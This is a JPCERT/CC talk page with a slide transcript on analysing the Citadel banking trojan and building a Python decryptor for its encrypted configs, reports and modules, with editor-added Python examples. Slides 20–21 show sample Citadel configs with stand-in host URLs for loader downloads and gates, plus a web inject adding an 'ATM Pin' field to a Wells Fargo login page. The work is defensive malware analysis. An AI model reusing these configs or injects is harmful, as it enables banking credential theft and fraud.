Fight Against Citadel in Japan  by You Nakatsuru

Lately in Japan the malware Citadel has been implicated in multiple internet banking unauthorised transaction incidents.
Citadel is a banking trojan much like ZeuS. When the malware successfully infects a user's environment it uses special functions called Web Injects to alter the website displayed on the end user's computer in order to steal login credentials for internet banking sites.
To handle Citadel infection incidents, it is necessary to clarify what settings the Citadel malware uses and what servers it communicates with; therefore it is essential to have an in-depth knowledge of Citadel and to conduct research on the files left by Citadel. In this presentation I will present my findings from detailed analysis of Citadel and introduce data transmission reconstruction and file reconstruction tools which have been created to handle Citadel incidents.

You Nakatsuru

You 'Tsuru' Nakatsuru, CISSP is a "just married" Information Security Analyst of Analysis Center at JPCERT/CC (Japan Computer Emergency Response Team Coordination Center) since April 2013.
His primary responsibilities are to analyze malware abused in highly sophisticated cyber attacks, along with R&D on advanced counter malware technologies and cutting-edge incident handling methods. He also takes an active role in capacity building for junior malware analysts.

Presentation Transcript

  • Fight Against Citadel in Japan 2014/02/18 JPCERT/CC Analysis Center NAKATSURU You
  • Copyright©2014 JPCERT/CC All rights reserved.1 Agenda
      Background: Unauthorized Remittance in Japan
      Analyzing Citadel: Overview; Encryption
      Making of Citadel Decryptor
      Citadel Decryptor: Usage; Demo
  • Copyright©2014 JPCERT/CC All rights reserved.2 BACKGROUND
  • Copyright©2014 JPCERT/CC All rights reserved.3 Illegal Transfer in Japan [bar chart of yearly losses for 2011, 2012 and 2013; values shown: $14 million, $500k, $3 million] Source: http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf Targeting 32 Banks
  • Copyright©2014 JPCERT/CC All rights reserved.4 Related with Malware http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf In most cases, passwords are retrieved and abused through defaced web pages where malware requests users to authenticate
  • Copyright©2014 JPCERT/CC All rights reserved.5 Banking Trojan ZeuS Ice IX Citadel GameOver SpyEye Carberp etc.
  • Copyright©2014 JPCERT/CC All rights reserved.6 Why Citadel? http://blog.trendmicro.com/trendlabs-security-intelligence/citadel-makes-a-comeback-targets-japan-users/
  • Copyright©2014 JPCERT/CC All rights reserved.7 Banking Trojan Incident [diagram: Attacker, Back Connect Server, Web Panel, User, Internet Banking]
  • Copyright©2014 JPCERT/CC All rights reserved.8 Web Injects User Internet Banking
  • Copyright©2014 JPCERT/CC All rights reserved.9 Web Injects Demo
  • Copyright©2014 JPCERT/CC All rights reserved.10 Builder & Web Panel
  • Copyright©2014 JPCERT/CC All rights reserved.11 Underground Market
  • Copyright©2014 JPCERT/CC All rights reserved.12 Our Incident Response [diagram: Attacker, Back Connect Server, Web Panel, User, Internet Banking; Information Sharing]
  • Copyright©2014 JPCERT/CC All rights reserved.13 Information We Need [diagram: Attacker, Back Connect Server, Web Panel, User, Internet Banking; questions marked on the diagram: Which site is targeted; Where (Back Connect Server); Where (Web Panel); How; Where (Attacker)]
  • Copyright©2014 JPCERT/CC All rights reserved.14 ANALYZING CITADEL
  • Copyright©2014 JPCERT/CC All rights reserved.15 External Information Leaked Citadel Web panel Builder Leaked ZeuS Web panel Builder ZeuS source Web panel source Builder source Binary Debug info Blogs Sophos LEXSI
  • Copyright©2014 JPCERT/CC All rights reserved.16 Analysis Method
      Surface Analysis: retrieving information
      Runtime Analysis: monitoring tools, sandbox and debugging
      Static Analysis: reading source code, assembly code
  • Copyright©2014 JPCERT/CC All rights reserved.17 Static Analysis Diffing with ZeuS
  • Copyright©2014 JPCERT/CC All rights reserved.18 Citadel Overview Sending report Current settings, etc. Web Injects
  • Copyright©2014 JPCERT/CC All rights reserved.19 Configuration Files
      Base Config: default settings; encryption key, URL of Dynamic Config; encoded and hardcoded
      Dynamic Config: additional settings; HTTP Injection, etc.; downloaded from servers
  • Copyright©2014 JPCERT/CC All rights reserved.20 Base Config
      botnet "CIT"
      timer_config 4 9
      timer_logs 3 6
      timer_stats 4 8
      timer_modules 1 4
      timer_autoupdate 8
      url_config1 "http://citadelhost/folder/file.php|file=config.dll"        <- Dynamic Config URL
      url_config2 "http://reserve-citadelhost/folder/file.php|file=config.dll" <- Dynamic Config URL
      remove_certs 1
      disable_cookies 0
      encryption_key "key123"                                                 <- Password to generate RC4 key
      report_software 1
      enable_luhn10_get 0
      enable_luhn10_post 1
      disable_antivirus 0
      use_module_video 1
      antiemulation_enable 0
      disable_httpgrabber 0
      use_module_ffcookie 1
  • Copyright©2014 JPCERT/CC All rights reserved.21 Dynamic Config
      url_loader "http://citadelhost/folder/file.php|file=soft.exe"
      url_server "http://citadelhost/folder/gate.php"
      file_webinjects "injects.txt"
      url_webinjects "http://citadelhost/folder/file.php"
      entry "AdvancedConfigs"
        "http://reserve-host1/folder/file.php|file=config.bin"
        "http://reserve-host2/folder/file.php|file=config.bin"
      end
      entry "WebFilters"
        "#*wellsfargo.com/*"
        "@*payment.com/*"
        "!http://*.com/*.jpg"
      end
      (snip)
      set_url https://www.wellsfargo.com/ GP
      data_before
        <div><strong><label for="userid">Username</la
      data_end
      data_inject
        <input type="text" accesskey="U" id="userid" na
        <DIV><STRONG><LABEL for=userid>ATM Pin</L
        style="WIDTH: 147px" tabIndex="2" maxLength=
        <DIV><STRONG><label for="password">Passwo
        <input type="password" accesskey="P" id="pass
        <input type="hidden" name="screenid" value="SI
        <input type="submit" value="Go" name="btnSign
        <input type="hidden" id="u_p" name="u_p" value
        </form>
      data_end
  • Copyright©2014 JPCERT/CC All rights reserved.22 Encryption
  • Copyright©2014 JPCERT/CC All rights reserved.23 Encrypted Data
  • Copyright©2014 JPCERT/CC All rights reserved.24 Encrypted Data
      Packet: POST data (report file); Dynamic Config; Additional modules
      File: Report; Backup of additional modules
      Registry: Current settings; Backup of Dynamic Config
  • Copyright©2014 JPCERT/CC All rights reserved.25 Encryption Method
      AES+: AES encryption and XOR encoding
      RC4+: RC4 encryption and XOR encoding
      RC4+ * 2: encryption with RC4+ twice
      Installed Data: AES+ encryption using a randomly generated key when installed
  • Copyright©2014 JPCERT/CC All rights reserved.26 In Case of Dynamic Config Base Config Dynamic Config XOR AES+ UCL
  • Copyright©2014 JPCERT/CC All rights reserved.27 0x400 Bytes Overlay
      Before install: PE file + Install setting + Padding
      After install: PE file + Installed data + Padding
      Overlay contents labelled in the diagram: XOR key; ID, Install paths, AES key, StrageArray key, etc.
  • Copyright©2014 JPCERT/CC All rights reserved.28 Encryption Summary
      Category  Data                      Format               Encryption
      Packet    Report                    Encrypted BinStrage  RC4+
      Packet    Dynamic Config            Encrypted BinStrage  AES+
      Packet    Additional modules        Executable           RC4+ * 2
      File      Report file               StrageArray          Installed Data
      File      Backup of modules         StrageArray          Installed Data
      Registry  Backup of Dynamic Config  Encrypted BinStrage  Installed Data
  • Copyright©2014 JPCERT/CC All rights reserved.29 MAKING OF CITADEL DECRYPTOR
  • Copyright©2014 JPCERT/CC All rights reserved.30 Our Goal Decrypt data & retrieve information for incident response
  • Copyright©2014 JPCERT/CC All rights reserved.31 Implementation Python PyCrypto pefile UCL
  • Copyright©2014 JPCERT/CC All rights reserved.32 RC4+ Decryption Get RC4 keystream RC4 Visual Decrypt
  • Copyright©2014 JPCERT/CC All rights reserved.33 RC4+ Implementation
      # Python 2 code from the slide: RC4 keystream XOR, then XOR with the LOGINKEY
      def rc4_plus_decrypt(login_key, base_key, buf):
          S1 = base_key['state']        # RC4 state derived from the Base Config key (modified in place)
          S2 = map(ord, login_key)      # LOGINKEY bytes for the second XOR layer
          out = ""
          i = j = k = 0
          for c in buf:
              # RC4 PRGA step
              i = (i + 1) & 0xFF
              j = (j + S1[i]) & 0xFF
              S1[i], S1[j] = S1[j], S1[i]
              # ciphertext byte XOR keystream byte XOR LOGINKEY byte
              out += chr((ord(c) ^ S1[(S1[i] + S1[j]) & 0xFF]) ^ S2[k % len(S2)])
              k += 1
          return out
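As an added example (my code, not the slides' or the JPCERT/CC decryptor's), the same RC4+ layer in Python 3 together with the two pieces the slide takes as given: deriving the RC4 state from the Base Config encryption_key, which I assume is standard RC4 key scheduling, and the "Visual Decrypt" step listed in the slide's flow, which I assume is the ZeuS-family byte-chaining XOR from the leaked ZeuS source. Because every layer is an XOR, one routine both encrypts and decrypts, so the block round-trips a constructed report and checks the plain RC4 core against the published "Key"/"Plaintext" test vector. The key string is the one from the Base Config slide; the LOGINKEY and report text are constructed.

```python
# Added example, not the slides' code. Assumptions: standard RC4 KSA over the
# Base Config encryption_key, and the ZeuS-family "visual" chaining XOR. The
# LOGINKEY and plaintext below are constructed sample values.

def rc4_ksa(key: bytes) -> list:
    """Standard RC4 key scheduling: 256-byte state from the Base Config key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_plus(login_key: bytes, state: list, buf: bytes) -> bytes:
    """RC4 keystream XOR followed by a repeating XOR with the LOGINKEY.
    Pure XOR layers, so one routine both encrypts and decrypts. The state is
    copied so the caller's schedule is not consumed by the PRGA."""
    S1 = list(state)
    out = bytearray()
    i = j = 0
    for k, c in enumerate(buf):
        i = (i + 1) & 0xFF                      # RC4 PRGA step
        j = (j + S1[i]) & 0xFF
        S1[i], S1[j] = S1[j], S1[i]
        ks = S1[(S1[i] + S1[j]) & 0xFF]
        out.append(c ^ ks ^ login_key[k % len(login_key)])
    return bytes(out)


def visual_encrypt(data: bytes) -> bytes:
    """Forward chain: each byte XORed with the previous (already chained) byte."""
    d = bytearray(data)
    for i in range(1, len(d)):
        d[i] ^= d[i - 1]
    return bytes(d)


def visual_decrypt(data: bytes) -> bytes:
    """Inverse of visual_encrypt: walk backwards so each step still sees the
    chained neighbour that was used when encrypting."""
    d = bytearray(data)
    for i in range(len(d) - 1, 0, -1):
        d[i] ^= d[i - 1]
    return bytes(d)


def rc4_plus_unpack(login_key: bytes, state: list, blob: bytes) -> bytes:
    """The slide's order: RC4 (+LOGINKEY XOR), then visual decrypt."""
    return visual_decrypt(rc4_plus(login_key, state, blob))


def rc4_plus_pack(login_key: bytes, state: list, plain: bytes) -> bytes:
    """Reverse order; used here only to build data for the round trip."""
    return rc4_plus(login_key, state, visual_encrypt(plain))


# Constructed sample parameters (encryption_key "key123" is the value shown on
# the Base Config slide; LOGINKEY and report text are made up for the example).
BASE_STATE = rc4_ksa(b"key123")
LOGIN_KEY = b"LOGINKEY-sample"
PLAIN = b"bot_id=CIT_example&report=login_form_seen\x00"

if __name__ == "__main__":
    blob = rc4_plus_pack(LOGIN_KEY, BASE_STATE, PLAIN)
    print(blob.hex())
    print(rc4_plus_unpack(LOGIN_KEY, BASE_STATE, blob))
```

With a one-byte zero LOGINKEY the second XOR layer vanishes and rc4_plus is plain RC4, which is how the block can be checked against a standard RC4 test vector before trusting it on real Citadel data.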
  • Copyright©2014 JPCERT/CC All rights reserved.34 Get AES key AES Decrypt Visual Decrypt AES+ Decryption
  • Copyright©2014 JPCERT/CC All rights reserved.35 AES+ Implementation
      # Python 2 code from the slide: AES decryption, then XOR with the AES+ XOR key
      from Crypto.Cipher import AES   # PyCrypto
      def unpack_aes_plus(login_key, base_key, xor_key, aes_key, data):
          aes = AES.new(aes_key)      # PyCrypto's default mode is ECB
          tmp = aes.decrypt(data)
          out = ""
          for i in range(len(tmp)):
              # XOR key repeated over the whole buffer
              out += chr(ord(tmp[i]) ^ ord(xor_key[i % len(xor_key)]))
          return out
  • Copyright©2014 JPCERT/CC All rights reserved.36 Decryption Parameter
      Base Config: RC4 key
      Installed Data: StrageArray key; Random AES key
      Others: Salt; LoginKey; RC4 XOR key
  • Copyright©2014 JPCERT/CC All rights reserved.37 Obtaining Parameter
      re.compile(".*\x56\xBA(..)\x00\x00\x52\x68(....)\x50\xE8....\x8B\x0D.*", re.DOTALL)
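An added example of putting that pattern to work (my code, not the decryptor's): the slide's regex, with the yen signs read as the backslashes they render from, applied to a constructed byte buffer standing in for an unpacked Citadel module, and the resulting address mapped to a file offset the way a section table allows. The fixed bytes are x86 opcodes (push esi; mov edx, imm32; push edx; push imm32; push eax; call rel32; mov ecx, [disp32]), so the two captures are the 16-bit value loaded into edx and the 32-bit immediate pushed after it. The image bytes, section table and image base are constructed; pefile is not required, but the comment notes the equivalent pefile call.

```python
import re
import struct

# Added example, not the decryptor's code. PARAM_RE is the slide's pattern as a
# bytes regex (Python 3). The fixed opcodes are:
#   56 push esi | BA imm32 mov edx, imm32 | 52 push edx | 68 imm32 push imm32
#   50 push eax | E8 rel32 call | 8B 0D disp32 mov ecx, [disp32]
# The pattern pins the upper two bytes of the mov immediate to zero, so group 1
# is a 16-bit value and group 2 the 32-bit immediate that is pushed.
PARAM_RE = re.compile(rb".*\x56\xBA(..)\x00\x00\x52\x68(....)\x50\xE8....\x8B\x0D.*",
                      re.DOTALL)


def find_params(image: bytes):
    """Return (imm16, imm32) or None. With the leading greedy .* and re.DOTALL,
    match() settles on the last occurrence of the sequence in the image."""
    m = PARAM_RE.match(image)
    if m is None:
        return None
    (imm16,) = struct.unpack("<H", m.group(1))
    (imm32,) = struct.unpack("<I", m.group(2))
    return imm16, imm32


def va_to_offset(va, image_base, sections):
    """Map a virtual address to a file offset using (VirtualAddress, VirtualSize,
    PointerToRawData) tuples, i.e. what the PE section table holds. On a real
    file, pefile's pe.get_offset_from_rva(va - pe.OPTIONAL_HEADER.ImageBase)
    does the same job."""
    rva = va - image_base
    for vaddr, vsize, raw in sections:
        if vaddr <= rva < vaddr + vsize:
            return raw + (rva - vaddr)
    return None


# Constructed stand-in for an unpacked module: filler, the instruction sequence
# with edx = 0x0100 and a pushed address of 0x00403000, then more filler.
SAMPLE = (b"\x90" * 8
          + b"\x56\xBA" + struct.pack("<H", 0x0100) + b"\x00\x00"
          + b"\x52\x68" + struct.pack("<I", 0x00403000)
          + b"\x50\xE8" + b"\x11\x22\x33\x44"
          + b"\x8B\x0D" + b"\x00\x00\x00\x00"
          + b"\xCC" * 4)

# Constructed section table: (VirtualAddress, VirtualSize, PointerToRawData).
SECTIONS = [(0x1000, 0x1000, 0x400), (0x2000, 0x2000, 0x1400)]
IMAGE_BASE = 0x00400000


def locate_in_file(image=SAMPLE):
    """Combine both steps: (imm16, file offset of the pushed address) or None."""
    found = find_params(image)
    if found is None:
        return None
    imm16, imm32 = found
    return imm16, va_to_offset(imm32, IMAGE_BASE, SECTIONS)


if __name__ == "__main__":
    print(locate_in_file())
```

The file offset is what the decryptor needs because the parameters are read from the unpacked module on disk, not from a running process; on a real sample the section tuples come from pefile's section table instead of the constructed list.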
  • Copyright©2014 JPCERT/CC All rights reserved.38 UCL Decompress http://www.oberhumer.com/opensource/ucl/
  • Copyright©2014 JPCERT/CC All rights reserved.39 UCL Decompress using ctypes
      from ctypes import cdll, c_buffer, c_int, pointer
      # UCL: path to the UCL shared library; DECOMPRESS_MAX_SIZE: size of the output buffer
      # (both are module-level settings of the decryptor)
      def _ucl_decompress(self, data):
          ucl = cdll.LoadLibrary(UCL)
          compressed = c_buffer(data)
          decompressed = c_buffer(DECOMPRESS_MAX_SIZE)
          decompressed_size = c_int()
          # ucl_nrv2b_decompress_le32(src, src_len, dst, dst_len, wrkmem); wrkmem is unused, pass NULL
          result = ucl.ucl_nrv2b_decompress_le32(
              pointer(compressed), c_int(len(data)),
              pointer(decompressed), pointer(decompressed_size), None)
          return decompressed.raw[:decompressed_size.value]
  • Copyright©2014 JPCERT/CC All rights reserved.40 CITADEL DECRYPTOR
  • Copyright©2014 JPCERT/CC All rights reserved.41 Environment
      Citadel Decryptor is only available for 32-bit environments: Windows + 32-bit Python
      PyCrypto: for AES decryption; Windows binary: http://www.voidspace.org.uk/python/modules.shtml#pycrypto
      pefile: a Python module for parsing the PE file format (Windows executables); used for parsing PE sections to get decryption params
  • Copyright©2014 JPCERT/CC All rights reserved.42 Data Requirement
      Encrypted data
      Unpacked Citadel: RC4 key; XOR key for AES+; XOR key for RC4+ (LOGINKEY); Salt for RC4+
      Installed Citadel: Installed Data; Random generated AES key; Random generated StrageArray key
  • Copyright©2014 JPCERT/CC All rights reserved.43 citadel_decryptor.py
      Encrypted data & unpacked module are always required
      >citadel_decryptor.py
      usage: citadel_decryptor.py [-h] [-n] [-a] [-d] [-o OUT] [-D] [-l LOGIN] [-k KEY] [-x XOR] [-s SALT] [-i INSTALLED] [-m MODE] [-v] DAT EXE
      citadel_decryptor.py: error: too few arguments
      >
  • Copyright©2014 JPCERT/CC All rights reserved.44 Cheat Sheet
      The following options have to be specified as well as encrypted data and unpacked Citadel
      Category  Data                      Option
      Packet    Report                    -m2
      Packet    Dynamic Config            -d
      Packet    Additional modules        -m3 -n
      File      Report files              -a -i [Installed Citadel]
      File      Backup of modules         -a -i [Installed Citadel]
      Registry  Backup of Dynamic Config  -d -i [Installed Citadel]
  • Copyright©2014 JPCERT/CC All rights reserved.45 Demo
  • Copyright©2014 JPCERT/CC All rights reserved.46 Tips
      Convert registry data to binary: export data using regedit & convert them to binary using the following FileInsight plugin: https://github.com/nmantani/FileInsight-plugins
      Unpacking: it is easy to break on APIs (WriteProcessMemory; CreateProcessW; VirtualFree / VirtualFreeEx / RtlFreeHeap); dump the executable (not after allocated) from virtual memory, including the 0x400 bytes overlay
  • Copyright©2014 JPCERT/CC All rights reserved.47 Future Tasks
      We already have: ZeuS Decryptor (Ver 2.0.8.9; Ver 2.9.6.1); Ice IX Decryptor; etc.
      We want: Gameover (P2P ZeuS) Decryptor
  • Thank You! Contact aa-info@jpcert.or.jp https://www.jpcert.or.jp Incident report info@jpcert.or.jp https://www.jpcert.or.jp/form/